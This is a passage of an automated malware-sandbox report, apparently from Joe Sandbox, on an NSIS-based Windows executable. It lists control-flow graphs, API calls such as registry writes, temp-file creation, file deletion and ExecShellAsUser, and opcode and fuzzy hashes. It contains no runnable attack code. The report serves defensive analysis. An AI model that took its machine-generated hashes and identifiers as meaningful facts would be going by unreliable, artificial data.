                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp$C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dll$ExecShellAsUser
                                                                                                                                                                                              • API String ID: 1941528284-2496772727
                                                                                                                                                                                              • Opcode ID: ef34b70ba7e76013f08a8010c699c1fb49796a167d53f933b8375716ae072387
                                                                                                                                                                                              • Instruction ID: c6e8234c1d4b6e0ef99598e998ad36802638a9a190aaa2bd7459f070bf199d51
                                                                                                                                                                                              • Opcode Fuzzy Hash: ef34b70ba7e76013f08a8010c699c1fb49796a167d53f933b8375716ae072387
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9841B471900514BACF107BA5CD45DAF3A79EF05368F20423FF422B10E1DA3C86919A6E

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              control_flow_graph 627 406624-406644 GetSystemDirectoryW 628 406646 627->628 629 406648-40664a 627->629 628->629 630 40665b-40665d 629->630 631 40664c-406655 629->631 633 40665e-406691 wsprintfW LoadLibraryExW 630->633 631->630 632 406657-406659 631->632 632->633
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                                                                                                              • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                              • Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
                                                                                                                                                                                              • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              control_flow_graph 634 403116-40312d 635 403136-40313f 634->635 636 40312f 634->636 637 403141 635->637 638 403148-40314d 635->638 636->635 637->638 639 40315d-40316a call 403331 638->639 640 40314f-403158 call 403347 638->640 644 403170-403174 639->644 645 40331f 639->645 640->639 646 4032ca-4032cc 644->646 647 40317a-4031c3 GetTickCount 644->647 648 403321-403322 645->648 649 40330c-40330f 646->649 650 4032ce-4032d1 646->650 651 403327 647->651 652 4031c9-4031d1 647->652 653 40332a-40332e 648->653 657 403311 649->657 658 403314-40331d call 403331 649->658 650->651 654 4032d3 650->654 651->653 655 4031d3 652->655 656 4031d6-4031e4 call 403331 652->656 659 4032d6-4032dc 654->659 655->656 656->645 668 4031ea-4031f3 656->668 657->658 658->645 666 403324 658->666 663 4032e0-4032ee call 403331 659->663 664 4032de 659->664 663->645 671 4032f0-4032f5 call 405e62 663->671 664->663 666->651 670 4031f9-403219 call 4067f5 668->670 676 4032c2-4032c4 670->676 677 40321f-403232 GetTickCount 670->677 675 4032fa-4032fc 671->675 678 4032c6-4032c8 675->678 679 4032fe-403308 675->679 676->648 680 403234-40323c 677->680 681 40327d-40327f 677->681 678->648 679->659 684 40330a 679->684 685 403244-40327a MulDiv wsprintfW call 405322 680->685 686 40323e-403242 680->686 682 403281-403285 681->682 683 4032b6-4032ba 681->683 688 403287-40328e call 405e62 682->688 689 40329c-4032a7 682->689 683->652 690 4032c0 683->690 684->651 685->681 686->681 686->685 694 403293-403295 688->694 693 4032aa-4032ae 689->693 690->651 693->670 695 4032b4 693->695 694->678 696 403297-40329a 694->696 695->651 696->693
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountTick$wsprintf
                                                                                                                                                                                              • String ID: ... %d%%
                                                                                                                                                                                              • API String ID: 551687249-2449383134
                                                                                                                                                                                              • Opcode ID: 791be84a4dbf0ce6e2b89685bbb0426d8c944effbebd544c9fcf1485a6d681ca
                                                                                                                                                                                              • Instruction ID: f437ad28db75119c3a693f92e670aa5c34007c7df9fe8e0debaece40423bbb79
                                                                                                                                                                                              • Opcode Fuzzy Hash: 791be84a4dbf0ce6e2b89685bbb0426d8c944effbebd544c9fcf1485a6d681ca
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D517D71900219DBDB10DF66EA44AAE7BB8AB04356F54417FEC14B72C0CB388A51CBA9

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              control_flow_graph 697 401c1f-401c3f call 402c1f * 2 702 401c41-401c48 call 402c41 697->702 703 401c4b-401c4f 697->703 702->703 704 401c51-401c58 call 402c41 703->704 705 401c5b-401c61 703->705 704->705 708 401c63-401c7f call 402c1f * 2 705->708 709 401caf-401cd9 call 402c41 * 2 FindWindowExW 705->709 721 401c81-401c9d SendMessageTimeoutW 708->721 722 401c9f-401cad SendMessageW 708->722 720 401cdf 709->720 723 401ce2-401ce5 720->723 721->723 722->720 724 402ac5-402ad4 723->724 725 401ceb 723->725 725->724
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                                              • Opcode ID: 3fb84e4798befa08d55ab41dd677560f87883767086f956b8989b4831fa63046
                                                                                                                                                                                              • Instruction ID: 1af55e8da281c8781352e9764615226c40e2312ccaecb42dabcb88ef8baddf82
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fb84e4798befa08d55ab41dd677560f87883767086f956b8989b4831fa63046
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889809B19

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              control_flow_graph 728 4023e4-402415 call 402c41 * 2 call 402cd1 735 402ac5-402ad4 728->735 736 40241b-402425 728->736 737 402427-402434 call 402c41 lstrlenW 736->737 738 402438-40243b 736->738 737->738 740 40243d-40244e call 402c1f 738->740 741 40244f-402452 738->741 740->741 745 402463-402477 RegSetValueExW 741->745 746 402454-40245e call 403116 741->746 750 402479 745->750 751 40247c-40255d RegCloseKey 745->751 746->745 750->751 751->735
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseValuelstrlen
                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp
                                                                                                                                                                                              • API String ID: 2655323295-2844774887

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              control_flow_graph 753 4057f1-40583c CreateDirectoryW 754 405842-40584f GetLastError 753->754 755 40583e-405840 753->755 756 405869-40586b 754->756 757 405851-405865 SetFileSecurityW 754->757 755->756 757->755 758 405867 GetLastError 757->758 758->756
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405848
                                                                                                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405867
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3449924974-0

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              control_flow_graph 759 405c97-405cb2 call 4062ba call 405c3a 764 405cb4-405cb6 759->764 765 405cb8-405cc5 call 40654e 759->765 766 405d10-405d12 764->766 769 405cd5-405cd9 765->769 770 405cc7-405ccd 765->770 772 405cef-405cf8 lstrlenW 769->772 770->764 771 405ccf-405cd3 770->771 771->764 771->769 773 405cfa-405d0e call 405b8f GetFileAttributesW 772->773 774 405cdb-405ce2 call 4065fd 772->774 773->766 779 405ce4-405ce7 774->779 780 405ce9-405cea call 405bdb 774->780 779->764 779->780 780->772
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00002000,00403460,00472EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                                • Part of subcall function 00405C3A: CharNextW.USER32(?,?,00464250,?,00405CAE,00464250,00464250,004DF000,?,74DF3420,004059EC,?,004DF000,74DF3420,00000000), ref: 00405C48
                                                                                                                                                                                                • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                                                                                                                                                                • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                                                                                                                                                              • lstrlenW.KERNEL32(00464250,00000000,00464250,00464250,004DF000,?,74DF3420,004059EC,?,004DF000,74DF3420,00000000), ref: 00405CF0
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00464250,00464250,00464250,00464250,00464250,00464250,00000000,00464250,00464250,004DF000,?,74DF3420,004059EC,?,004DF000,74DF3420), ref: 00405D00
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                              • String ID: PBF
                                                                                                                                                                                              • API String ID: 3248276644-3456974464

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              control_flow_graph 782 405ddf-405deb 783 405dec-405e20 GetTickCount GetTempFileNameW 782->783 784 405e22-405e24 783->784 785 405e2f-405e31 783->785 784->783 786 405e26 784->786 787 405e29-405e2c 785->787 786->787
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405DFD
                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,004CB000,0040338D,004DB000,004DF000,004DF000,004DF000,004DF000,004DF000,74DF3420,004035D9), ref: 00405E18
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                                              • String ID: nsa
                                                                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                                                                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                • Part of subcall function 00405322: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,0040327A,0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0), ref: 0040537D
                                                                                                                                                                                                • Part of subcall function 00405322: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\), ref: 0040538F
                                                                                                                                                                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                                                                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 334405425-0
                                                                                                                                                                                              • Opcode ID: 72a5e19f9697d1318c9a310d29b5b60265bfdb2e952e74c10cb73e1909f0eb38
                                                                                                                                                                                              • Instruction ID: 3abd81b96889d1c7eb1cceed2e7b5e281284f1a6e6a9a5ff44b88a827c8e1d1c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 72a5e19f9697d1318c9a310d29b5b60265bfdb2e952e74c10cb73e1909f0eb38
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8821B071D00205AACF20AFA5CE48A9E7A70BF04358F60413BF511B11E0DBBD8981DA6E
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GlobalFree.KERNELBASE(00770720), ref: 00401BE7
                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00004004), ref: 00401BF9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                              • String ID: ExecShellAsUser
                                                                                                                                                                                              • API String ID: 3394109436-869331269
                                                                                                                                                                                              • Opcode ID: 0ee5b69d2cfb3a0a2e0f3aae0319e9b1983c649d140d642359d16bc307d41886
                                                                                                                                                                                              • Instruction ID: 2ffc4b8e8b305263ff1bfe934f744a2e7f0909984677ca7ca3d2d917788d1148
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ee5b69d2cfb3a0a2e0f3aae0319e9b1983c649d140d642359d16bc307d41886
                                                                                                                                                                                              • Instruction Fuzzy Hash: 52210A76600100ABCB10FF95CE8499E73A8EB48318BA4443FF506F32D0DB78A852DB6D
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004065FD: FindFirstFileW.KERNELBASE(004DF000,00468298,00464250,00405CE0,00464250,00464250,00000000,00464250,00464250,004DF000,?,74DF3420,004059EC,?,004DF000,74DF3420), ref: 00406608
                                                                                                                                                                                                • Part of subcall function 004065FD: FindClose.KERNELBASE(00000000), ref: 00406614
                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 00402299
                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 004022A4
                                                                                                                                                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1486964399-0
                                                                                                                                                                                              • Opcode ID: 29d6f0bed4bd2d50b69dd1226e545e03bb95794d8620927361660d91590f24b0
                                                                                                                                                                                              • Instruction ID: edc96df04b91ed766a503f65766f364d086ea8d205cfe5bb15309c141496b913
                                                                                                                                                                                              • Opcode Fuzzy Hash: 29d6f0bed4bd2d50b69dd1226e545e03bb95794d8620927361660d91590f24b0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 57117071900318A6DB10EFF98E4999EB7B8AF04344F50443FB805F72D1D6B8C4419B59
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00405D8B: GetFileAttributesW.KERNELBASE(?,?,00405990,?,?,00000000,00405B66,?,?,?,?), ref: 00405D90
                                                                                                                                                                                                • Part of subcall function 00405D8B: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405DA4
                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405B66), ref: 0040599F
                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,?,00000000,00405B66), ref: 004059A7
                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 004059BF
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1655745494-0
                                                                                                                                                                                              • Opcode ID: 280825f6b60181aa2d378306bbdc3da53de5ab3d89a200e418c4f7b9ea6af3cc
                                                                                                                                                                                              • Instruction ID: 825022a906987a8d14f11fb4079f6fb6242afe5a54bc5f1377d2c32e3c215ab4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 280825f6b60181aa2d378306bbdc3da53de5ab3d89a200e418c4f7b9ea6af3cc
                                                                                                                                                                                              • Instruction Fuzzy Hash: D1E0E5B1119F5096D21067349A0CB5B2AA4DF86334F05093AF891F11C0DB3844068EBE
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00405C3A: CharNextW.USER32(?,?,00464250,?,00405CAE,00464250,00464250,004DF000,?,74DF3420,004059EC,?,004DF000,74DF3420,00000000), ref: 00405C48
                                                                                                                                                                                                • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                                                                                                                                                                • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                • Part of subcall function 004057F1: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,004D3000,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1892508949-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3356406503-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00405405
                                                                                                                                                                                                • Part of subcall function 0040427D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                                                                              • CoUninitialize.COMBASE(00000404,00000000), ref: 00405451
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2896919175-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Window$EnableShow
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1136574915-0
                                                                                                                                                                                              • Opcode ID: 87f8232cb56b7a5d6ce9856bfa50bd061077f9975d19b3a51d23438555d97d86
                                                                                                                                                                                              • Instruction ID: fc8c1c2e7d4a5a8f9e35cd12a8e681b154a8316ed36a6d041aa31def844ca7e2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 87f8232cb56b7a5d6ce9856bfa50bd061077f9975d19b3a51d23438555d97d86
                                                                                                                                                                                              • Instruction Fuzzy Hash: 61E01A72E082008FE724ABA5AA495AD77B4EB90365B20847FE211F11D1DA7858819F6A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                                • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                                • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                                • Part of subcall function 00406624: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                                                                              • Opcode ID: 2c450699f5e5c6ed5e41876474a170b73f17b01a65d70064c3ee9ca103cb2d45
                                                                                                                                                                                              • Instruction ID: 155b38c425e345f43688a0673e138072f65e923c2ca09dacbbabb210d44f0fbf
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c450699f5e5c6ed5e41876474a170b73f17b01a65d70064c3ee9ca103cb2d45
                                                                                                                                                                                              • Instruction Fuzzy Hash: 50E0863250461156D31197709E4487762EC9B95750307483EF946F2091DB399C36A66D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FreeLibrary.KERNELBASE(?,004DF000,00000000,74DF3420,004038ED,00403703,00000006,?,00000006,00000008,0000000A), ref: 0040392F
                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00403936
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1100898210-0
                                                                                                                                                                                              • Opcode ID: bd7b370b1f223a5589d226506ef49f546026ce3eccc4315b581019b2d362f361
                                                                                                                                                                                              • Instruction ID: 228f896298dd83b048f64e6024dd5859bf02c68f9830d759f3998b57695c5827
                                                                                                                                                                                              • Opcode Fuzzy Hash: bd7b370b1f223a5589d226506ef49f546026ce3eccc4315b581019b2d362f361
                                                                                                                                                                                              • Instruction Fuzzy Hash: 12E0C2334122205BC6215F04ED08B5A776CAF49B32F15407AFA807B2A087B81C928FC8
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(004E7000,00402F1D,004E7000,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                                              • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
